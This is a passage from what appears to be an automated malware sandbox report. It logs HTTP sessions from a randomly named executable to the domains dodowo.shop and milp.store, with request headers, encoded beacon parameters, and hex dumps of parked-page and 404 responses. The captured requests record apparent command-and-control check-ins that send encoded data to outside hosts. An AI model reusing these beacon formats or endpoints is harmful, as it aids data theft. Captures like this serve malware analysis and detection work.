                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 53 71 61 6b 5a 51 38 39 48 2f 56 57 72 5a 6b 6d 4e 37 33 58 41 58 4b 36 51 68 7a 44 69 65 44 58 43 49 72 69 37 49 67 6e 46 71 44 4c 46 55 52 50 6f 6a 6f 35 31 45 73 31 4b 6b 6a 62 64 69 79 31 73 4c 38 69 66 62 39 4f 41 5a 51 6e 6b 6b 6f 54 43 65 37 31 4c 34 35 58 78 4a 37 6b 65 48 4d 6c 57 37 35 55 34 57 6c 38 62 6c 51 34 50 34 77 37 6d 36 38 6b 73 33 55 70 55 42 50 4d 54 53 78 33 49 49 6a 58 65 49 65 77 4d 6d 39 77 2b 39 4a 2f 47 56 77 76 78 52 2b 48 49 6c 73 6c 72 4b 6a 52 58 57 79 39 63 6e 4f 70 43 2b 53 6d 46 78 79 75 4a 50 6f 6e 67 61 63 54 68 5a 37 6f 76 4a 79 36 6a 33 43 6e 6c 4c 45 64 53 59 75 33 73 4e 67 33 73 55 38 35 4f 4e 5a 68 73 41 39 70 74 4d 5a 6e 4a 39 7a 48 49 41 6a 72 66 42 54 5a 51 5a 45 36 63 68 32 4c 6d 38 64 64 2b 64 58 36 78 62 64 6c 59 42 48 57 4e 77 73 69 57 54 6a 4e 5a 6a 6d 4f 46 39 52 6d 69 30 46 39 73 4b 30 2b 31 63 44 59 43 33 35 6a 73 33 46 72 6a 4c 58 2f 64 73 4b 70 4a 50 39 39 6b 34 37 4c 6b 4e 55 47 52 56 36 54 35 53 2b 62 6d 37 6d 62 79 62 73 [TRUNCATED]
                                                                                                                    Data Ascii: nzs0T2=SqakZQ89H/VWrZkmN73XAXK6QhzDieDXCIri7IgnFqDLFURPojo51Es1Kkjbdiy1sL8ifb9OAZQnkkoTCe71L45XxJ7keHMlW75U4Wl8blQ4P4w7m68ks3UpUBPMTSx3IIjXeIewMm9w+9J/GVwvxR+HIlslrKjRXWy9cnOpC+SmFxyuJPongacThZ7ovJy6j3CnlLEdSYu3sNg3sU85ONZhsA9ptMZnJ9zHIAjrfBTZQZE6ch2Lm8dd+dX6xbdlYBHWNwsiWTjNZjmOF9Rmi0F9sK0+1cDYC35js3FrjLX/dsKpJP99k47LkNUGRV6T5S+bm7mbybs3/0zj7cjYzMvexuBdRsdZLzNpYYldyOoBxd3Zvm6cLL1Y1L23KiQocm0VaxRqJje1RyBEu11/Damr7CbaUX4YZpdCIZ7hMOGlQbnsD8DbuL5gq6YzFKighk8sbS2QHem/YMLslnZG22htcqCkbW4UXT/VUTNav5v7Qzd/TxRY5cH6AbKgAFs4kekpZNyA/pa/7tDOk2YgZdAb77pIbsVMN16lPMRMEbUImv9fQg3LmKQWQ8EHLP8c8VsKToL+kjBXJLDYqeaXDWBgt7Pk5MNGJkRlu/ougMbqi30MJj5M8627X98K6JIvuMWKY0OSDsujUbt3xlRq+7F+KubtsV3+d9JVqzJsIULGjK0UW6Jq6MJ+r1ReYDqYvMyE8RSmR74h4rig+GMXl3NKdMQizqz1Rh6EXE9Gtqz6n/7tzETTOFnSFzkFVoAhxTXubFmSXuhNB+/of18aYLMznI2NO1ZqOU+v1o6XCeJT60C8BgL0TCiuGMCDEtFpmegAjIYcF4nW7a7Mb1g9SNIl0ra56YvW1nYuuB/IKFnxvUjzZvqqvamvGvxK7kMGTO2HSqTXMtRxiqOOpTvanOz1+gyt93rowC1DRMaP3nRv/naM23tboY5krfRVTFxzjnMLLFDt0LSdjlrS5Pp/X+AqwwT7V1+mLtc21jrzp6vdY [TRUNCATED]
                                                                                                                    Jan 10, 2025 20:49:44.683546066 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: openresty
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:44 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c [TRUNCATED]
                                                                                                                    Data Ascii: e99ZK>{,T,7)Her*(jIHxiG(VJ1k9IZLw====3w'^v4=B\Mb3*qbf2qzWgYz$fBG+<"pO>#o)#<Q1@e@f*#xQYCy8$Z<7Yzo~??-:ql|{c;ZxR&$c#|mH)ZBLG84n@BzS_,QIm8 h38Y-J{B:AQ~"Cys4oy'~rlBAaFh3b2q kQ]RQ6OwS(%|`f7DLhG0->8|G!XfR%DEUI'WA^OI!Mf9,P.j5f^8a)%5|Qe/jm\]!i<v9:L0i{S( fM/jW)>yD0`n(4_-mt?}|AH|r7F$&}qt5cmr)Jty*&};ay32#zDGiOk%sxj>#YBL&_`D5Q0Q3M1N\5>B0}BLtK
                                                                                                                    Jan 10, 2025 20:49:44.683592081 CET1236INData Raw: 87 77 1c 5f 62 98 06 91 98 16 af 63 12 8c c6 99 06 0d 30 ea f0 19 4c a3 9a 01 b9 a5 f5 8b 01 70 2d 9f 43 a0 d7 9d 4f 28 c5 37 2a 31 47 a0 13 9f 43 d0 1d ef 23 da f4 81 50 d3 a9 ab 1e a1 53 2c 74 d2 3f 94 36 5a 9f 92 2c a7 31 ca 4c 02 4e 70 a3 2e
                                                                                                                    Data Ascii: w_bc0Lp-CO(7*1GC#PS,t?6Z,1LNp.Mfu]"{9Js=(e1r1Ew<E>$"w,ge#`L{pjNC\^WV!tU<^]T7+2B4Zn9B1i-?k03
                                                                                                                    Jan 10, 2025 20:49:44.683614016 CET448INData Raw: 77 86 c3 61 bf 34 a4 31 6b ad 3b f5 76 dd eb 17 2e 61 50 ec 07 39 eb 75 e1 5f 7a dd af 38 03 b7 7a 9f a7 68 c3 27 b0 63 15 fb ff a2 71 6e 7c 98 43 4f 35 5b 2d 3e c5 77 11 d4 51 1a 12 4d b6 59 af d7 17 6d 7d 5e 6b 15 c7 24 b6 69 3b 4d 12 4d 4b ad
                                                                                                                    Data Ascii: wa41k;v.aP9u_z8zh'cqn|CO5[->wQMYm}^k$i;MMK^*tT|de 2U]Zv$LI{4Ia,6Y!{cJFVzDV"9;[V.PfVcr@ll(:w`V_L&!1Rp^N
                                                                                                                    Jan 10, 2025 20:49:44.683629036 CET1236INData Raw: 56 5b ba dd 68 eb 8e d3 d6 6d 0d 59 bf e0 8d aa dd 6c ea 1d 1b 1a 1b 1a b2 2d eb 17 9b a1 57 c3 b0 c4 ae c6 da 66 7c d5 76 1c c0 b1 74 bb 63 2d e0 2d dd b1 3a ba 5d b7 76 a2 4b f2 06 d7 60 43 0e da 66 06 a7 e9 80 0e 4d dd 2a cd c0 1b 9b ba 6d cd
                                                                                                                    Data Ascii: V[hmYl-Wf|vtc--:]vK`CfM*moJYZC7Z7v}2N>Am$WFXhml7'sn;|r&h@Fp3gi>0XSX-AOph$n5
                                                                                                                    Jan 10, 2025 20:49:44.683641911 CET1236INData Raw: 16 d6 b6 04 59 4e b6 35 f2 df 3b 33 7c 88 12 49 89 8a d3 7e b9 6e 90 85 cd c7 cc 68 34 9c 17 87 4c 4f 3d e3 d7 74 93 9d d6 99 d8 67 1a ac 66 e4 27 24 3f 51 c1 c7 f9 13 9f fe 09 16 52 56 b3 12 47 06 a9 55 d0 08 ec 0b c2 a8 af a2 b1 43 46 a7 96 d1
                                                                                                                    Data Ascii: YN5;3|I~nh4LO=tgf'$?QRVGUCFu{x_~Qujpazbyr7_Hc,5h=v]nkcuz*iiC=-2CmYqa`L)yN%w^{?<2\Lsz
                                                                                                                    Jan 10, 2025 20:49:44.683655024 CET1236INData Raw: 4f 8c 0d da 83 83 ee 68 23 31 72 b2 b9 57 c0 32 f7 0a d0 26 31 17 80 8d 7d 1c ac b1 cf 04 94 af 12 13 4c d1 65 00 29 ba 4c 10 c5 12 33 81 94 7d 06 98 b2 4f b2 d5 7d 55 4a 5e 8f 98 22 5e c0 88 29 cd 0b 37 2d 68 46 c4 75 70 2d 3c 6a 6b 81 94 7c b4
                                                                                                                    Data Ascii: Oh#1rW2&1}Le)L3}O}UJ^"^)7-hFup-<jk|+S}b'A@Y=RN]Nuz]L?<pABLX[[a|p[K.UoC,H$xM)7e;U(w&C0+Ye|dz
                                                                                                                    Jan 10, 2025 20:49:44.683667898 CET311INData Raw: 2a 35 3b c1 d3 18 fa 60 af d3 a6 44 c4 0d aa 59 f0 08 a8 f1 44 12 0b b7 c6 01 82 a0 98 35 71 61 ea 75 cc 15 8e b6 37 60 b9 c5 8c 44 e5 83 9a 03 6a d7 50 c4 a3 1f b5 43 e1 a0 86 43 8d ab a6 ba ff 43 15 a2 22 d5 7d 87 13 cb 7d fb 1e 72 13 98 fb 26
                                                                                                                    Data Ascii: *5;`DYD5qau7`DjPCCC"}}r&'o6Yi+/il_{e(eS1Nn~R3%\3%39%fe,#aC4FL<.;$<xdHV:Fmvx}l3,{~Xg]
                                                                                                                    Jan 10, 2025 20:49:44.685189962 CET1236INData Raw: 62 34 64 0d 0a c4 5d 4f 6f 24 47 15 3f b3 9f a2 99 15 08 89 74 bb fe 76 75 05 db 91 08 a0 e4 b0 68 95 80 38 5a e3 b1 63 0f 3b f6 58 33 f6 38 d9 13 42 42 8a 14 0e 20 0e 48 20 0e 91 22 e5 82 50 38 22 3e d2 3a df 81 f7 fb 55 75 4f cf 78 66 d6 6c 1c
                                                                                                                    Data Ascii: b4d]Oo$G?tvuh8Zc;X38BB H "P8">:UuOxflEz_]x9Gx9az'+teG",JDEzbEqydxq#Uxn6x[TE'toQXSN/&crHtC"I_4
                                                                                                                    Jan 10, 2025 20:49:44.685220957 CET1236INData Raw: d5 67 9f 7e fd d9 57 3d f2 f6 6e 26 87 4b 07 be bf 27 b6 9c 3c ff d3 35 8f 93 bc fd d6 d0 b0 c1 7f b1 c7 1b 78 e8 07 78 cb 9c 60 a5 9b 2f eb 61 be 8d 18 cb 1b 38 c2 a0 ad ed bd 6c 29 3f 0f b5 a1 25 d7 f0 7e 1e 9d 5b 8e 01 6d 3d 1d 28 fc fe e9 49
                                                                                                                    Data Ascii: g~W=n&K'<5xx`/a8l)?%~[m=(IOtBxE.!d\.S6r2p_5-n3;=@,B6#[:q'B_sKc,y(KYOTe^
                                                                                                                    Jan 10, 2025 20:49:44.685233116 CET428INData Raw: 1c aa c6 27 73 01 a5 92 25 93 eb be 7e c3 68 fc fe e5 fc 7a 78 36 1b 5e 7c eb f1 78 dc 8d f4 58 11 b9 c3 f8 9d c7 e4 8e 8b f7 a3 b2 58 d2 37 c8 31 b5 92 94 31 f7 46 af 22 61 e8 81 cc 4d ce c3 bb 9a 54 3e 97 ae b9 63 ea 54 26 04 04 49 63 d0 8d c3
                                                                                                                    Data Ascii: 's%~hzx6^|xXX711F"aMT>cT&IcvQRkz%[48"SySOZI.9/i1P.2Hl=QWG/&%}CNbe~&2'*0r$@g
                                                                                                                    Jan 10, 2025 20:49:44.700551987 CET1236INData Raw: 35 39 61 0d 0a ec 1d cb 6e db 38 f0 9c bf 60 5d a0 37 69 2d 4b 7e 64 9b b6 68 0b 14 e8 21 28 16 db 7b a0 c4 72 64 44 6b 39 91 dc 6e f7 54 a0 a7 fe ce 7e d6 62 3f 62 39 33 24 35 a4 28 59 36 d2 6e 11 14 01 2c 8a 1c 0d df 33 c3 79 30 2d cb 43 97 92
                                                                                                                    Data Ascii: 59an8`]7i-K~dh!({rdDk9nT~b?b93$5(Y6n,3y0-CVt['jS+s1o[D"chj=*zMtUn_V[Pjc?GP03;m^3)^kitUrVE-t}M[cxtc#x1i-#K


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.649999112.175.247.179802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:45.829828024 CET582OUTGET /44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo+oiUz5nR/Y3bTUTystoAVEPBhAuIJq0FzLvmkL65YpPHBdFMnQ+RN4nJ4f0YiJMRNqIhlsXwKcwXCFylpIZyPQ/A=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dodowo.shop
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Jan 10, 2025 20:49:46.967080116 CET487INHTTP/1.1 301 Moved Permanently
                                                                                                                    Server: openresty
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:46 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 0
                                                                                                                    Connection: close
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Redirect-By: WordPress
                                                                                                                    Location: http://dodowo.shop/44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo+oiUz5nR/Y3bTUTystoAVEPBhAuIJq0FzLvmkL65YpPHBdFMnQ+RN4nJ4f0YiJMRNqIhlsXwKcwXCFylpIZyPQ/A=&mLFl=BXYPt2lXBpi8Dj


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.650000194.9.94.86802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:52.100171089 CET830OUTPOST /oqbp/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.milp.store
                                                                                                                    Origin: http://www.milp.store
                                                                                                                    Referer: http://www.milp.store/oqbp/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 211
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 71 58 31 44 33 45 42 37 77 77 42 4d 39 31 4e 52 54 36 62 69 4a 53 33 55 36 79 63 63 70 6e 46 6b 70 2f 76 4c 50 51 65 62 44 30 64 64 73 77 61 43 4d 75 2f 72 45 47 7a 52 6c 49 57 71 51 56 37 36 41 70 62 79 57 6a 2f 4d 59 39 49 55 61 5a 76 44 63 65 45 67 54 37 48 6e 61 2f 41 48 63 61 68 76 45 71 2b 59 4d 35 44 36 65 70 75 6a 79 50 69 75 61 72 73 65 4d 49 33 30 4f 66 67 49 6b 65 6c 50 32 41 46 4b 53 32 76 53 53 50 54 4d 63 67 51 37 36 6a 78 48 59 54 52 52 59 75 45 31 42 59 43 48 6b 67 5a 79 34 53 49 71 70 53 4d 4e 6a 44 47 70 55 76 66 66 58 2b 30 33 52 45 2f 30 6e 74 48 53 56 59 56 34 2f 6b 7a 50 77 44 59 4e
                                                                                                                    Data Ascii: nzs0T2=qX1D3EB7wwBM91NRT6biJS3U6yccpnFkp/vLPQebD0ddswaCMu/rEGzRlIWqQV76ApbyWj/MY9IUaZvDceEgT7Hna/AHcahvEq+YM5D6epujyPiuarseMI30OfgIkelP2AFKS2vSSPTMcgQ76jxHYTRRYuE1BYCHkgZy4SIqpSMNjDGpUvffX+03RE/0ntHSVYV4/kzPwDYN
                                                                                                                    Jan 10, 2025 20:49:52.737390041 CET1236INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:52 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/8.1.30
                                                                                                                    Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                                                    Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                                                    Jan 10, 2025 20:49:52.737443924 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                                                                                    Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                                                                                    Jan 10, 2025 20:49:52.737481117 CET448INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                                                                                    Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                                                                                    Jan 10, 2025 20:49:52.737517118 CET1236INData Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20
                                                                                                                    Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
                                                                                                                    Jan 10, 2025 20:49:52.737552881 CET1236INData Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e
                                                                                                                    Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
                                                                                                                    Jan 10, 2025 20:49:52.737588882 CET430INData Raw: 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67
                                                                                                                    Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    14192.168.2.650001194.9.94.86802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:54.648653030 CET854OUTPOST /oqbp/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.milp.store
                                                                                                                    Origin: http://www.milp.store
                                                                                                                    Referer: http://www.milp.store/oqbp/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 235
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 71 58 31 44 33 45 42 37 77 77 42 4d 2f 57 46 52 52 5a 6a 69 50 79 33 56 6d 43 63 63 37 6e 46 6f 70 2f 6a 4c 50 56 37 41 41 43 74 64 73 56 6d 43 4c 76 2f 72 4a 6d 7a 52 75 6f 57 6a 64 31 37 74 41 70 58 45 57 69 44 4d 59 39 63 55 61 59 66 44 63 4f 34 6a 53 72 48 70 50 50 41 42 59 61 68 76 45 71 2b 59 4d 35 57 74 65 71 65 6a 79 2f 53 75 62 4a 55 64 50 49 33 31 4a 66 67 49 79 75 6c 44 32 41 45 66 53 30 4c 30 53 4e 62 4d 63 68 67 37 37 78 56 47 4c 7a 52 58 56 4f 46 41 49 49 32 4b 6d 44 49 78 36 69 74 4c 30 67 38 76 69 31 62 7a 49 63 66 38 46 75 55 31 52 47 6e 47 6e 4e 48 34 58 59 74 34 74 7a 2f 6f 2f 33 39 75 47 51 73 43 7a 63 6e 67 6a 78 53 6a 55 31 42 6b 34 2b 4c 6a 4a 77 3d 3d
                                                                                                                    Data Ascii: nzs0T2=qX1D3EB7wwBM/WFRRZjiPy3VmCcc7nFop/jLPV7AACtdsVmCLv/rJmzRuoWjd17tApXEWiDMY9cUaYfDcO4jSrHpPPABYahvEq+YM5Wteqejy/SubJUdPI31JfgIyulD2AEfS0L0SNbMchg77xVGLzRXVOFAII2KmDIx6itL0g8vi1bzIcf8FuU1RGnGnNH4XYt4tz/o/39uGQsCzcngjxSjU1Bk4+LjJw==
                                                                                                                    Jan 10, 2025 20:49:55.362905025 CET1236INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:55 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/8.1.30
                                                                                                                    Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
